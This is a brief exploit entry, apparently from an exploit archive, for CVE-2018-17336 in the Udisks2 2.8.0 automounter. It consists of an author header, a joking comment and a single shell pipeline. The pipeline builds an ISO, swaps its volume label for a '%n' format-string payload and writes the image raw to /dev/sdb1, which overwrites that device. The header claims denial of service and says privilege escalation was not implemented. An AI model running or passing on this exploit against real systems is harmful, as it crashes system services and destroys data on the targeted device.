## CVE-2018-17336# https://oxasploits.com/posts/exploit-archive-partial-disclosure/# Author: Marshall Whittaker / oxagast# oxagast@oxasploits.com# Udisks2 automounter 2.8.0 DOS / privesc maybe possible but not implemented# Tried but could not find a filesystem with a label long enough, except for NTFS,# but NTFS is strictly unicode, and would require significatly more effort to work# around.## Cuz guuuuuuuurlllll... it's a mistake to mount this# How about you mount me instead?
genisoimage -V"AAAAAAAA"-o dos.iso /etc/passwd &&dd if=dos.iso | sed-e's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1